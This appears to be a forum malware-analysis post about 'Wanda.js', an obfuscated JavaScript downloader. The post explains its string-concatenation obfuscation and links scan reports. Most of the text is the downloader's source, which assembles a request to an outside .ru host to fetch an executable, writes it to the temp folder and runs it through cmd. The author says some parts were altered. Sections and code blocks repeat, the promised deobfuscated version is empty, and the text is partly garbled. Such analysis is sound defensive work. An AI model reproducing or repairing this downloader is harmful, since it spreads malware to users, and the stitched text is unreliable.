- May 14, 2016
- 1,597
Wanda.js
6/55
It downloads a Payload that seems to be protected against VM environments :
boxun4.exe
Script : JavaScript
1) Quick Look at the code :
I removed / change some parts to avoid copy-past => file => run = infection
Obfuscation : Important strings used to constructs objects, methods, paths are build by function calls / concatenation
- you can't find by simple "find" tool any part( easy to find in a lot of obfuscated scripts) : open; write, ActiveXObject , etc,
- there isn't a "quick first obfuscation step" with second obfuscation method, etc...
2) Let's deobfuscate it :
First step : put in first the var that are out of functions, and at the end the functions
Second step : Look at the try...catch part :
try {
In fact, all the deobfuscation has to begin with this part. All other vars and functions are only here to retrieve the goods strings.
var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3];
=> var wjerco = "Scri" +"ptin" + "g.Fi" + "leSy" + "stem" + "Obje" + "ct";
=> var wjerco = "Scripting.FileSystemObject";
All deobfuscation can be made the same way
3) Deobuscated Version :
try {
4) Conclusion about obfuscation method used :
What could appear "difficult", can be in real "easy", just have to well make a look at the whole script to find the good steps for deobfuscation.
5) Conclusion :
Deobfuscation of the downloader script can shows urls, methods, paths used, cmd, registry, , UAC bypassing method, etc ..., and also if a parameter has to be used => it then allows the dynamical analysis of the payload only.
Here, no parameter found.
After reported on VirusTotal, the analysis has shown no encrypting behavior :
the payload seems to be aware if it is run in a protected environment (VM, etc)
(see the spoiler part at the beginning)
(Don't hesitate to look at my previous analyzes, I try to analysis each time different methods of obfuscation, and their 'updates')
6/55
It downloads a Payload that seems to be protected against VM environments :
The result when I reported only the payload :
https://www.hybrid-analysis.com/sam...01c44715045b4a14cd6ac4d9d01?environmentId=100
But by virusTotal :
8 /55
https://www.virustotal.com/en/file/...a556ce66f468c1ad40b739432c159a8d30a/analysis/
https://www.hybrid-analysis.com/sam...01c44715045b4a14cd6ac4d9d01?environmentId=100
But by virusTotal :
8 /55
https://www.virustotal.com/en/file/...a556ce66f468c1ad40b739432c159a8d30a/analysis/
Script : JavaScript
1) Quick Look at the code :
I removed / change some parts to avoid copy-past => file => run = infection
var bygpufo = ["AD", "67778", "lkikatk", "udoj", "12323", "39378", "adnuxfe", "58453", "72505"];
var unafme = ["omyf", "61453", "qetsu", 703];
var ycharara6 = ["igygo", "fxanap", "tvalu", "yffevmorp", "yrikyfa", 'ru', "67080", "yjamu"];
var nzisyjs8 = ["xpyxsu", "amruq", "46708", "ct"];
var sbogewob0 = ["13898", "/re", "xexrejy"];
var udfoxsovz = ["62573", "82790", "86374", "90081", "yqebcyh", "le", "84249", "28400", "91602"];
function ogxetjowy() {
var dazfeb = [];
dazfeb["uboxyre"] = 'reqetdo';
dazfeb["nukjojg"] = "awetlowf";
dazfeb["dywxissy"] = "esi";
return dazfeb["dywxissy"];
}
var spudni0 = ["74499", "ylutfafb", "14321", "66448", 185, "ehtequjse", "68786", "83022", "95621"];
function izyq0() {
var ewydsuh6 = [];
ewydsuh6["pyzezgahz"] = "stem";
ewydsuh6["egdive"] = 'yzywbo';
ewydsuh6["alebo"] = "ycamm";
ewydsuh6["odmijibx"] = 'ajevisz';
ewydsuh6["jakonbajn"] = 'ilit';
return ewydsuh6["pyzezgahz"];
}
var cgyhi = ["jmuretx", "Tem"];
function zbyxizi5() {
var jahifa = [];
jahifa["icacy"] = 'izval';
jahifa["cbegeqsa"] = "wor";
jahifa["adfajawa"] = "some";
jahifa["ivgijgo"] = "uhvyhy";
return jahifa["cbegeqsa"];
}
function ufmotuz0() {
var ijfixepli4 = ["Bo", "70997", "ixhygtu", "kcehy", "ejkyhfawc", "82072", "vtedkyr", "ednymga", "btoje", "19482"]
return ijfixepli4[0];
}
var ovuz = ["T", "kxijpusyl"];
var tsapapte4 = ["85561", "86025", "52842", "49322", "41374", "87951", "Fu", "29050", "vuxe"];
function ewzeq5() {
var leqsintifw = ["soxulcom", "oqeltu", "kidisi", "49802", "49486", "rdejycji", "on", "jjylluxucg", "76375"]
return leqsintifw[6];
}
var fkuwyqu = ["l", "tycefi"];
function vijtikuwm() {
var nqyculagl = ["34204", "altohuv", "infyfragb", "61714", "12444", "43113", "96273", "Po", "ajewxeru", "63659"]
return nqyculagl[7];
}
var eqdakn7 = ["ipyxkofqu", 'Op'];
var osubcy0 = ["tveqgulhap", "OD", "etbodmusn", "50240", "31808", "68950"];
function tokoful8() {
var lryte = [];
lryte["toziftez"] = "sypuhra";
lryte["odixbulma"] = "js/";
lryte["fupi"] = "axhijgepk";
lryte["egsiz"] = "tufru";
return lryte["odixbulma"];
}
function ifbow() {
var pivuqkun1 = ["ptin", "bcocezev", "ubikexj", "29887"]
return pivuqkun1[0];
}
var miqypce2 = ["70952", "86477", "aracn", "upafata", "esijmapu", "37602", "XO", "obufdylo", "10040", "uqodo"];
function utes1() {
var oqabfafa = ["eflogwabgu", "87506", "xbogrynon", "ip"]
return oqabfafa[3];
}
function unolodx() {
var luzurnad = [];
luzurnad["etyfholn"] = "t.";
luzurnad["itdyvm"] = 'ombiru';
luzurnad["zsymka"] = "hmogiqwe";
luzurnad["oxlubjy"] = "oqojfevl";
luzurnad["ukyqpi"] = "abkirxa";
return luzurnad["etyfholn"];
}
var ohhif = ['Typ', "hovxibt", "onsajqabd", "ebiqbimxo", "64801", "40052", "23202", "otuvvuxza", "nzawun"];
function usyl() {
var prohkyky3 = ["vapjom", "24087", "59596", "72094", "ti"]
return prohkyky3[4];
}
var gagy = ["52411", "ptuqlo", "vmomisn", "omdavbesbe", "70533", 100, "64644", "apodhegp", "uspyfolu"];
function ulhuj() {
var lbagnycu2 = [];
lbagnycu2["gbaxpe"] = 'Wri';
lbagnycu2["npazaxe"] = 'xrykaku';
lbagnycu2["hnulhikt"] = 'avbuzliv';
lbagnycu2["ipevvigr"] = "adnak";
lbagnycu2["fibyfhaps"] = 'aputvo';
return lbagnycu2["gbaxpe"];
}
var utamnom0 = ["giro", 'me', "76931"];
var lxyvgu = ["qurexyr", "81309", "69525", "ojodwoqg", "erybu", "r", "25482"];
function lgywny() {
var oraljy4 = [];
oraljy4["bkazyfseh"] = 'lpasu';
oraljy4["nrynu"] = 'nwubid';
oraljy4["iqnahoz"] = 'pgepad';
oraljy4["ypadacta"] = 'ipkib';
oraljy4["ehifeft"] = 'Get';
return oraljy4["ehifeft"];
}
function zululmudb6() {
var abyzj9 = [];
abyzj9["kopaj"] = "aqaffy";
abyzj9["fycex"] = "ernonwe";
abyzj9["oxuvatgu"] = "bbubdoqfi";
abyzj9["bydwo"] = 'cnygpuq';
abyzj9["mjismurum"] = "e";
return abyzj9["mjismurum"];
}
function sbedi() {
var gqejja = ["38831", "30067", 'pNa', "41057", "48810", "egoq", "exqexe", "93968", "onxumwy", "evydecy"]
return gqejja[2];
}
var culalgo = ["92888", "71980", "Ar", "lfehkyl", "zxati", "42851"];
var myhzaxn = ["levpi", 'Sc', "25748"];
function qkanutfujt() {
var jmupgalajs = ["hlugald", 'n', "98246", "89757", "yviq", "uhaxl", "72898", "54749", "sxirnatz", "23444"]
return jmupgalajs[1];
}
var vzyqifp1 = ["Get", "ynyhkux", "qoqohy"];
var etnivwoqze = ["mgilni", "77938", "ybmehfitke", "rmewge", "65972", "25482", "Sa", "31329"];
function rofxu() {
var urumpi = ['de', "93154"]
return urumpi[0];
}
function gatkyx5() {
var uxqace9 = ["le", "keqlivess", "28140", "ugzyw", "horwoh", "awucqyj", "ofdaki", "okwiz", "xytcem"]
return uxqace9[0];
}
var ysryqi = ["90147", "73137", "hoka", "48832", "leSy", "gyfocpibf"];
var idnyfij8 = ["jobwyfsa", "39382", 185, "jjimza"];
function elgybqe0() {
var ogkefbek = [".ad", "75715"]
return ogkefbek[0];
}
function lerzabhab() {
var odolxe8 = [];
odolxe8["vhexguhco"] = "ohdys";
odolxe8["pcoslyrdejb"] = "me";
odolxe8["vuji"] = "iftumjy";
odolxe8["dgemy"] = 'fozwal';
odolxe8["ucpamecsu"] = 'tuhvu';
return odolxe8["pcoslyrdejb"];
}
function urepwi() {
var lowonock = [];
lowonock["belzypu"] = 'ghysvek';
lowonock["enfaf"] = "ptujpa";
lowonock["icakk"] = "el";
return lowonock["icakk"];
}
function irifwid2() {
var qofvew = ["onyw", "XM", "hyjip", "eprizod", "qolypfum"]
return qofvew[1];
}
var oveghuqj = ["sgutawixn", "ukgabb", "42669", "re", "qvopvuzpy", "pumaq", "visgish", "59965"];
var qonijac = ["Ac", "70466", "eqoj", "edytmaxe", "jsajened"];
var gakahy = ["89526", "erobsybx", "qwuhwyvs", "35179", "xmidiza", 'Cl', "91132", "diboxe", "abaxols"];
var nolyf = ["29630", "twusryl", "rgevotw", "te."];
var tixqa3 = ["19254", "mibu", "esnijp", "HT"];
var xbanhe = ["32010", "nd", "okuzd", "91664", "30935"];
function qrawolow() {
var gfyva3 = [];
gfyva3["uzlimlop"] = "wmyjefgi";
gfyva3["bguzseko"] = "dy";
gfyva3["kwisydeq"] = 'abnita';
return gfyva3["bguzseko"];
}
function apmof() {
var shossiku6 = ["dhavneryqp", 'se', "extunimno", "50728", "64191", "onykwe", "evdomfar", "atubhufny", "86999", "axdepkocc"]
return shossiku6[1];
}
function kyfduhp9() {
var ucbas8 = ["73339", "TP", "78239"]
return ucbas8[1];
}
function nbepxebo7() {
var ysqobd7 = [];
ysqobd7["vrexhiln"] = "am";
ysqobd7["admofafdu"] = "asanreq";
ysqobd7["yhyxbyca"] = 'rodov';
return ysqobd7["vrexhiln"];
}
var wxavi4 = ["53960", "To", "ytxenbi", "ahufqa", "51322", "86510"];
var zegrolla = ["szydospy", "87961", 'us', "ocwuvcazjo", "ebup", "obehxyto", "mocefi", "uwsyw", "pukjobpi"];
var fupjyjn2 = ["ehloqari", 'St', "62367"];
var shyjabesp = ["17810", "xehuhaw", "le", "77218", "99857", "ijywu", "19892", "dtubmu", "64878"];
function gito4() {
var hihytxa2 = ["32942", "34427", "werympo", "dywtysidq", "Obje", "46865"]
return hihytxa2[4];
}
function gewyhvy5() {
var kopy3 = ["54411", "13830", "ex", "88989", "ezdixi", "vybojli"]
return kopy3[2];
}
var ogojbi9 = ["49473", "lwecqi", "42705", 'Spe', "avlabik"];
var tpexpon = ["kvezkify", "58415", "MS", "71896", "13958", "88679", "19137"];
function momvyze() {
var vluzsen = ["93167", "jfobmyrant", "Sh", "97215", "30396"]
return vluzsen[2];
}
function bjybpymmak() {
var ysimnafu = [];
ysimnafu["gwutvew"] = 'noziqwa';
ysimnafu["ijxus"] = 'ozjag';
ysimnafu["pyxivquzg"] = "on";
ysimnafu["epyti"] = "fbaxo";
ysimnafu["uxuni"] = "rtyjte";
return ysimnafu["pyxivquzg"];
}
function ojolahy4() {
var odyblo = [];
odyblo["cnaxke"] = "rabi";
odyblo["qxekwuj"] = "enkosunz";
odyblo["iqwynydg"] = "Re";
odyblo["tsoqad"] = "ysyjba";
odyblo["encihwiqf"] = "kfyjve";
return odyblo["iqwynydg"];
}
var vcyqkarj9 = ["box", "30470", "38474", "ogjut", "88574", "dlelfe", "ukuhzoxwe", "foveg", "fkufyznydw", "ocoryxi"];
function adefhi9() {
var zhyxfegwe = ["77254", "bj"]
return zhyxfegwe[1];
}
function socjyhlom0() {
var zqexu2 = [];
zqexu2["usginj"] = 'hvemijko';
zqexu2["qylac"] = "exuqox";
zqexu2["ydgetqe"] = "GE";
return zqexu2["ydgetqe"];
}
var esijy9 = ["45850", 100, "62916", "32146", "izinlyfi"];
function uzsebdypfy() {
var ecrurgaq = ["14831", 'cia', "28503", "ubkekiqs"]
return ecrurgaq[1];
}
function owutqosf5() {
var kesu = ['Na', "84350", "lihebybp"]
return kesu[0];
}
var ixjapa = ["60003", "ti", "27933", "27014", "wubxycz", "orugta", "83909"];
function elbixaqt() {
var owid7 = [];
owid7["tutdidub"] = 'udrucsav';
owid7["logebi"] = "ru/";
owid7["orobedz"] = "hyduxx";
owid7["imlarre"] = 'epappe';
owid7["ybqyvhezu"] = "uvydhajq";
return owid7["logebi"];
}
function apoljojk() {
var tzywe = ["ifon", "86894", "67475", "67879", "axvosvutr", "taliqh", "obrypsi", "51213", "nt", "33043"]
return tzywe[8];
}
function ubwydbupc() {
var fwycobzot = [];
fwycobzot["yjsulonwu"] = "fmica";
fwycobzot["vvoqxo"] = 'eruqh';
fwycobzot["hurbujt"] = "jlekxehk";
fwycobzot["ysexn"] = "sibdisti";
fwycobzot["zikumo"] = "Na";
return fwycobzot["zikumo"];
}
function ifag3() {
var bcevu3 = [];
bcevu3["unwebi"] = "opvabobr";
bcevu3["yttife"] = "jytu";
bcevu3["ypafa"] = 'pija';
bcevu3["akvatdilu"] = "g.Fi";
bcevu3["yldujoxxy"] = 'ukys';
return bcevu3["akvatdilu"];
}
function ewunta() {
var hfibotyf = [];
hfibotyf["aphecy"] = "dtobubta";
hfibotyf["sejoji"] = 'ksiniha';
hfibotyf["konaw"] = 'n';
hfibotyf["yweheto"] = "ytitxyzj";
return hfibotyf["konaw"];
}
var focvaq0 = ["72021", "ytlanpa", "81176", "avqutde", "qixkotnoc", "ve", "baqzeqy", "90063", "bgiqzon"];
function wsycli9() {
var onoztaxny0 = ["90538", "cony", "11158", "dacyty", "lxupyzymm", "kamfocvind", "t"]
return onoztaxny0[6];
}
var ucynucji0 = ["59001", "ec", "32190", "72212", "46163", "24252", "71307"];
var buvtyhe = ["74214", 778, "91132", "usilfe", "52588", "srupvukcal"];
function qbijyc() {
var svyppugwi6 = ["enrypfytsi", "61437", "51397", "htt", "80566", "86125"]
return svyppugwi6[3];
}
function ahfalo() {
var gkubuh = ["ewoza", "usfath", "yremxu", "apira", "87678", "lFo", "bdubexjej", "odorzyzi"]
return gkubuh[5];
}
var myjcigkab6 = ["ybep", "mpevgofxarm", "ohonp", "84011", "87257", WScript][5];
function xoxsebmyf() {
var nigkykh8 = [];
nigkykh8["lpivihemg"] = "oqozmes";
nigkykh8["ohawqy"] = 'xekmobze';
nigkykh8["ansycij"] = 'lde';
nigkykh8["edyguwf"] = 'ujazgotj';
return nigkykh8["ansycij"];
}
var ytuzzy4 = ["77477", "ajvixn", "fycfotp", "okemuc", "91397", "pabjoksin", "88360", 636, "13372"];
var jtytohhoqz9 = ["80093", "Scri", "21304"];
var hxoqny3 = ["fitajtanj", "54902", "30480", "75220", 'le', "99168", "80807", "ibgoly", "pume"];
function anpig() {
var ubpifm = ["28322", "83101", "gsughe", "qlebsog", "18788", "gam", "uvyldob", "iczihdo", "72024", "blatzu"]
return ubpifm[5];
}
var elgits9 = ["at", "wdasalqa"];
var psyqmomabc = ["itizi", "htetyhka", "nsicopl", "93052", "79924", 799, "hijgimtag", "jgodfi", "20828", "wfari"];
var yduv = ["90462", "cjahymutp", "32391", "ollygy", "22274", "24279", "egoq", "92190", "d."];
var fojjynb9 = ["13878", "19650", "90583", "14019", "84466", "52120", ".X", "89652"];
var cuqqywn0 = ["72744", "gu", "58492", "66141"];
function ucytw9() {
var pnicacfo0 = ["uxbybtu", "ixxizko", "58609", "14020", "e", "90766", "uhuh", "ilwev", "65482"]
return pnicacfo0[4];
}
function ibekh() {
var icqosocu4 = ["80273", "kira", "fxapuhikd", "htotycg", "20758", "lorde", "48415", "tbuhpejgem", "ML", "57863"]
return icqosocu4[8];
}
var ubyxs = ["arlemu", "53179", "ytjybcyqv", "selyqz", "46591", "72151", "67654", "th"];
function mufo0() {
var edypjyng = ['me', "idzuszuba", "iganb", "uhoj", "18882"]
return edypjyng[0];
}
var ukebt = ["53001", "24692", "72715", "L2"];
function coxxi4() {
var txidec = [];
txidec["koplabnowz"] = "udsivo";
txidec["syseptamc"] = "abit";
txidec["ujgage"] = 'ihbedygb';
txidec["omkawwo"] = 'll';
txidec["ojwoh"] = 'nule';
return txidec["omkawwo"];
}
function fihzard() {
var rendoqf0 = [];
rendoqf0["urwadaxu"] = "kurlezc";
rendoqf0["onog"] = 'en';
rendoqf0["gego"] = "vyqo";
rendoqf0["bzedy"] = 'pymxy';
rendoqf0["izix"] = "vsiskynte";
return rendoqf0["onog"];
}
var unaca = [703, "gcuwi", "ryno", "lnopu", "63526", "olkatu", "64491", "26490", "76071", "uberr"];
var zokahw = ["jugqe", 'ope', "osvatiki", "53293"];
function lires() {
var pumu = [];
pumu["cynmuct"] = "/c";
pumu["bytaqn"] = 'ydben';
pumu["gcebgut"] = "oguw";
pumu["emgytv"] = "olsoz";
return pumu["cynmuct"];
}
var ihdynkiri = ["s", "37570", "78532", "96473", "95345"];
function pyjxu() {
var izwitf = [];
izwitf["lwahhywte"] = "myzo";
izwitf["yhciqabxy"] = "evdohet";
izwitf["tqyhdogh"] = 'efgybuqw';
izwitf["onkubohro"] = "scahiri";
izwitf["awawqa"] = "cr";
return izwitf["awawqa"];
}
function gipertug9() {
var qolis2 = ["scuhibd", "npadi", "sepugp", "38920", "59978", "wmydkipogc", "d"]
return qolis2[6];
}
function mywoxd() {
var kxatmomk = ["44899", "yzluxtob", "objaxqalv", "xoxymydz", "hepina", "25635", "85528", "ng", "30722"]
return kxatmomk[7];
}
function ybufbedu4() {
var uqpupj = ["74845", "gyva", "18430", "48603", "ygrokgiwh", "98146", "98703", "e ", "ercydgiwxy", "xyjqi"]
return uqpupj[7];
}
var enibji = ["zragux", "quxaxs", "vetrur", "e", "47408", "efmacyzb"];
function incejpoki() {
var sirsen6 = ["si", "16068", "75326", "nafkadpaj"]
return sirsen6[0];
}
var enyrzo = ["62464", "obyri", "64768", "un4", "pevu", "tahowwajd", "81947"];
var wisore5 = ["81705", "28902", 'te', "afjygza", "62864", "afsewsi"];
function qzyjygde2() {
var darwisyd6 = [];
darwisyd6["imtuzyhsi"] = 'ozej';
darwisyd6["awejhifwo"] = "obvobukt";
darwisyd6["yjzohopz"] = 'te';
darwisyd6["wsepef"] = 'yrrytu';
darwisyd6["hatu"] = 'izdarewv';
return darwisyd6["yjzohopz"];
}
var ojeqono = ["dibeci", "84357", "47825", "39853", "dasfewep", "xubujq", "76347", "se"];
function ekzodi9() {
var dolguwvah = ["atbefujpi", "cgecbujo", "oldijo", 'Fi']
return dolguwvah[3];
}
function amernus() {
var xebbyfv7 = ["ksinbaj", "mpupu", 'Fi']
return xebbyfv7[2];
}
function irdulxy6() {
var fqozal8 = ["avyxsire", "cvijkot", "86382", "muhso", "53164", "62783", " ", "36477", "qugdalwe", "58516"]
return fqozal8[6];
}
function okymeln() {
var udcubfapbo = [];
udcubfapbo["fjotwekon"] = "pt";
udcubfapbo["jkinid"] = "lykorf";
udcubfapbo["olcujjo"] = "bejihti";
udcubfapbo["vlawa"] = 'rkirald';
udcubfapbo["bovybri"] = 'ozqodgyhr';
return udcubfapbo["fjotwekon"];
}
function ivugniva9() {
var mefanp = [];
mefanp["gdavy"] = 'iflisg';
mefanp["apadj"] = "irusu";
mefanp["opubgeg"] = "verkyl";
mefanp["yvrasuhl"] = 'onyfg';
mefanp["vogwav"] = "St";
return mefanp["vogwav"];
}
function fzerutu() {
var ifefne6 = [];
ifefne6["rnergywr"] = "me";
ifefne6["sydfazefv"] = 'yjnetx';
ifefne6["wona"] = 'yraqh';
return ifefne6["rnergywr"];
}
var ahuxaju3 = ["jolze", "efahj", "ult", "98019", "utacora", "jakmuqz", "uwsybrute", "50777", "16109"];
function igubijbi8() {
var peskuxroqk = ["30389", "WS"]
return peskuxroqk[1];
}
function yfvirz6() {
var qwykygid6 = [];
qwykygid6["obumg"] = 'ujkehfy';
qwykygid6["yszagr"] = "cm";
qwykygid6["coxca"] = "zwivov";
return qwykygid6["yszagr"];
}
var tfirsek = ["p:/", "gryhcaw", "31267", "ohuzki"];
function jtujekofq3() {
var kmexrajy0 = [];
kmexrajy0["intyjsabz"] = "cgafsacy";
kmexrajy0["epquku"] = "bsokhuny";
kmexrajy0["bqiwysme"] = "B.";
kmexrajy0["hnipdenpe"] = "asutjig";
return kmexrajy0["bqiwysme"];
}
var jarxid = ["zufatly", 've', "69796", "44204", "afodzuwa", "64212", "wsungowwa", "ujjijegj", "ixesyxle", "imdomce"];
function wleno5() {
var lisot7 = [];
lisot7["atvamx"] = 'qedmi';
lisot7["rkacokom"] = "os";
lisot7["essokviqp"] = "zuqda";
lisot7["qecy"] = 'ocela';
lisot7["coci"] = "ctuxla";
return lisot7["rkacokom"];
}
var uxardykv5 = ['\\\\', "jhibembyt"];
function isqadozve5() {
var ozgyfja = [];
ozgyfja["fqottyryw"] = "izbize";
ozgyfja["ibewki"] = "efoctu";
ozgyfja["ygig"] = 'ddujisy';
ozgyfja["upukopso"] = "der";
ozgyfja["zersykca"] = 'yrtuwib';
return ozgyfja["upukopso"];
}
function ucypygg() {
var ajvuzqom = ["sp", "lfujezo", "50274", "54052", "tiky"]
return ajvuzqom[0];
}
function ikirsime0() {
var ytorozta8 = ["riku", "86590", "tqegkebgo", "99204", "98256", "ixyj", ".ex", "owneswudo", "38360"]
return ytorozta8[6];
}
function onagij() {
var mufy6 = [];
mufy6["gkyxe"] = 'ufagk';
mufy6["ubwymk"] = 'ri';
mufy6["jusraxc"] = "wuddoke";
mufy6["yqinsy"] = 'ojhyz';
return mufy6["ubwymk"];
}
function tubvy() {
var ilizibo = ["99315", "46571", "72254", "93300", "jninuvc", myhzaxn[1] + onagij() + okymeln() + tsapapte4[6] + coxxi4() + owutqosf5() + mufo0()]
return ilizibo[5];
}
function yxubuhu() {
var zhirbiw4 = ["ussitgaby", "73969", "38268", "ultukkihy", "mliplu", eqdakn7[1] + fihzard(), "yludiw", "39046"]
return zhirbiw4[5];
}
function lymuvh() {
var hysdavy = [];
hysdavy["keku"] = vijtikuwm() + incejpoki() + ixjapa[1] + bjybpymmak();
hysdavy["abzan"] = 'usnuxqok';
hysdavy["aqjajo"] = 'ofoxu';
hysdavy["kebykvy"] = 'khypkexry';
hysdavy["mittete"] = "yxxefa";
return hysdavy["keku"];
}
function ackogyngu() {
var wberaquz = ["47357", "jabo", "87884", zokahw[1] + ewunta()]
return wberaquz[3];
}
function hwontyna() {
var hlapde = [];
hlapde["ripu"] = lgywny() + ogojbi9[3] + uzsebdypfy() + ahfalo() + xoxsebmyf() + lxyvgu[5];
hlapde["ibjylw"] = 'osniqo';
hlapde["zgope"] = "loti";
hlapde["otoh"] = 'ygbizolf';
return hlapde["ripu"];
}
function yretby5() {
var ufxibdaq = [];
ufxibdaq["stylguh"] = "ftoziznu";
ufxibdaq["appihhiru"] = vzyqifp1[0] + cgyhi[1] + sbedi() + utamnom0[1];
ufxibdaq["npukgysog"] = 'amteh';
ufxibdaq["lehfytp"] = "umotse";
ufxibdaq["nbotxikqy"] = "lperceq";
return ufxibdaq["appihhiru"];
}
function hojy3() {
var dwedy2 = [];
dwedy2["icriwmez"] = ohhif[0] + ucytw9();
dwedy2["vkazehi"] = 'orsegda';
dwedy2["ccyqimwa"] = 'haskecy';
dwedy2["uciwl"] = 'ride';
return dwedy2["icriwmez"];
}
function ydugo0() {
var uqsahhexga = [];
uqsahhexga["qrelqyql"] = apmof() + xbanhe[1];
uqsahhexga["eqxygduc"] = "arildowb";
uqsahhexga["gsylohakt"] = 'uqycvel';
return uqsahhexga["qrelqyql"];
}
function lsexnukmojn5() {
var ymelhexg = [];
ymelhexg["oqibw"] = "vini";
ymelhexg["mluhsynpu"] = "yqomy";
ymelhexg["bhabymko"] = 'fitgi';
ymelhexg["rdahse"] = fupjyjn2[1] + elgits9[0] + zegrolla[2];
ymelhexg["vcovbehylh"] = 'igovgy';
return ymelhexg["rdahse"];
}
function jwesifr0() {
var nanex = ["pgadla", "abeslimxa", ulhuj() + qzyjygde2(), "89931"]
return nanex[2];
}
function hogkevitm0() {
var gohakxu = [];
gohakxu["vsebe"] = 'exdyth';
gohakxu["ecnorfo"] = "ruwsyddu";
gohakxu["bvojul"] = 'buwse';
gohakxu["dygyj"] = ojolahy4() + ucypygg() + ewzeq5() + ojeqono[7] + ufmotuz0() + qrawolow();
gohakxu["hissift"] = "ugonf";
return gohakxu["dygyj"];
}
function jutu0() {
var zucna = [etnivwoqze[6] + jarxid[1] + wxavi4[1] + ekzodi9() + shyjabesp[2], "jnahhopjef", "64635"]
return zucna[0];
}
function isiqku2() {
var xmoty = [];
xmoty["nelpoqjez"] = "typud";
xmoty["siqi"] = gakahy[5] + wleno5() + zululmudb6();
xmoty["znidtysi"] = "byvmy";
xmoty["lecuzo"] = "sorxobo";
return xmoty["siqi"];
}
function amjugaxqa8() {
var zciqli4 = [];
zciqli4["uwep"] = "gmigex";
zciqli4["iqube"] = "feboqda";
zciqli4["swytyt"] = ycharara6[5] + qkanutfujt();
zciqli4["dyjunw"] = "vkomvi";
return zciqli4["swytyt"];
}
function zaddeqpa0() {
var yqyww = [];
yqyww["gqoqusy"] = "duquqc";
yqyww["labnitdo"] = 'miba';
yqyww["volqy"] = rofxu() + udfoxsovz[5] + wisore5[2] + amernus() + hxoqny3[4];
yqyww["kolbatezz"] = 'imorj';
return yqyww["volqy"];
}
try {
var eqnok2 = myjcigkab6;
if (!eqnok2[culalgo[2] + cuqqywn0[1] + fzerutu() + apoljojk() + ihdynkiri[0]][ubwydbupc() + lerzabhab() + gipertug9()][gatkyx5() + mywoxd() + ubyxs[7]]) {
var siga88 = eval(qonijac[0] + usyl() + focvaq0[5] + miqypce2[6] + adefhi9() + ucynucji0[1] + wsycli9());
}
var wjerco = jtytohhoqz9[1] + ifbow() + ifag3() + ysryqi[4] + izyq0() + gito4() + nzisyjs8[3];
var vihtew9 = bygpufo[0] + osubcy0[1] + jtujekofq3() + ivugniva9() + oveghuqj[3] + nbepxebo7();
var uglahup = tpexpon[2] + irifwid2() + ukebt[3] + fojjynb9[6] + ibekh() + tixqa3[3] + kyfduhp9();
var azjod = new siga88(vihtew9);
var urrigucx = new siga88(wjerco);
var opcakco = new siga88(uglahup);
var uffyvqo = qbijyc() + tfirsek[0] + sbogewob0[1] + zbyxizi5() + isqadozve5() + elgybqe0() + ahuxaju3[2] + anpig() + ogxetjowy() + nolyf[3] + elbixaqt() + tokoful8() + vcyqkarj9[0] + enyrzo[3] + ikirsime0() + enibji[3];
var mysfefyg = eqnok2[tubvy()];
azjod[yxubuhu()]();
var areglaly8 = igubijbi8() + pyjxu() + utes1() + unolodx() + momvyze() + urepwi() + fkuwyqu[0];
azjod[lymuvh()] = spudni0[4] - idnyfij8[2];
opcakco[ackogyngu()](socjyhlom0() + ovuz[0], uffyvqo, unaca[0] - unafme[3]);
var yzysa = urrigucx[hwontyna()](buvtyhe[1] - 776) + uxardykv5[0] + urrigucx[yretby5()]();
azjod[hojy3()] = ytuzzy4[7] - 635;
opcakco[ydugo0()]();
var imytalir = yfvirz6() + yduv[8] + gewyhvy5() + ybufbedu4() + lires() + irdulxy6() + yzysa;
if (opcakco[lsexnukmojn5()] == psyqmomabc[5] - 599) {
var zofa1 = new siga88(areglaly8);
azjod[jwesifr0()](opcakco[hogkevitm0()]);
azjod[jutu0()](yzysa);
azjod[isiqku2()]();
zofa1[amjug_axqa8()](imytalir, unaca[0] - unafme[3]);
}
urrigucx[zaddeqpa0()](mysfefyg);
} catch (yhvuhnybu2) {}
var unafme = ["omyf", "61453", "qetsu", 703];
var ycharara6 = ["igygo", "fxanap", "tvalu", "yffevmorp", "yrikyfa", 'ru', "67080", "yjamu"];
var nzisyjs8 = ["xpyxsu", "amruq", "46708", "ct"];
var sbogewob0 = ["13898", "/re", "xexrejy"];
var udfoxsovz = ["62573", "82790", "86374", "90081", "yqebcyh", "le", "84249", "28400", "91602"];
function ogxetjowy() {
var dazfeb = [];
dazfeb["uboxyre"] = 'reqetdo';
dazfeb["nukjojg"] = "awetlowf";
dazfeb["dywxissy"] = "esi";
return dazfeb["dywxissy"];
}
var spudni0 = ["74499", "ylutfafb", "14321", "66448", 185, "ehtequjse", "68786", "83022", "95621"];
function izyq0() {
var ewydsuh6 = [];
ewydsuh6["pyzezgahz"] = "stem";
ewydsuh6["egdive"] = 'yzywbo';
ewydsuh6["alebo"] = "ycamm";
ewydsuh6["odmijibx"] = 'ajevisz';
ewydsuh6["jakonbajn"] = 'ilit';
return ewydsuh6["pyzezgahz"];
}
var cgyhi = ["jmuretx", "Tem"];
function zbyxizi5() {
var jahifa = [];
jahifa["icacy"] = 'izval';
jahifa["cbegeqsa"] = "wor";
jahifa["adfajawa"] = "some";
jahifa["ivgijgo"] = "uhvyhy";
return jahifa["cbegeqsa"];
}
function ufmotuz0() {
var ijfixepli4 = ["Bo", "70997", "ixhygtu", "kcehy", "ejkyhfawc", "82072", "vtedkyr", "ednymga", "btoje", "19482"]
return ijfixepli4[0];
}
var ovuz = ["T", "kxijpusyl"];
var tsapapte4 = ["85561", "86025", "52842", "49322", "41374", "87951", "Fu", "29050", "vuxe"];
function ewzeq5() {
var leqsintifw = ["soxulcom", "oqeltu", "kidisi", "49802", "49486", "rdejycji", "on", "jjylluxucg", "76375"]
return leqsintifw[6];
}
var fkuwyqu = ["l", "tycefi"];
function vijtikuwm() {
var nqyculagl = ["34204", "altohuv", "infyfragb", "61714", "12444", "43113", "96273", "Po", "ajewxeru", "63659"]
return nqyculagl[7];
}
var eqdakn7 = ["ipyxkofqu", 'Op'];
var osubcy0 = ["tveqgulhap", "OD", "etbodmusn", "50240", "31808", "68950"];
function tokoful8() {
var lryte = [];
lryte["toziftez"] = "sypuhra";
lryte["odixbulma"] = "js/";
lryte["fupi"] = "axhijgepk";
lryte["egsiz"] = "tufru";
return lryte["odixbulma"];
}
function ifbow() {
var pivuqkun1 = ["ptin", "bcocezev", "ubikexj", "29887"]
return pivuqkun1[0];
}
var miqypce2 = ["70952", "86477", "aracn", "upafata", "esijmapu", "37602", "XO", "obufdylo", "10040", "uqodo"];
function utes1() {
var oqabfafa = ["eflogwabgu", "87506", "xbogrynon", "ip"]
return oqabfafa[3];
}
function unolodx() {
var luzurnad = [];
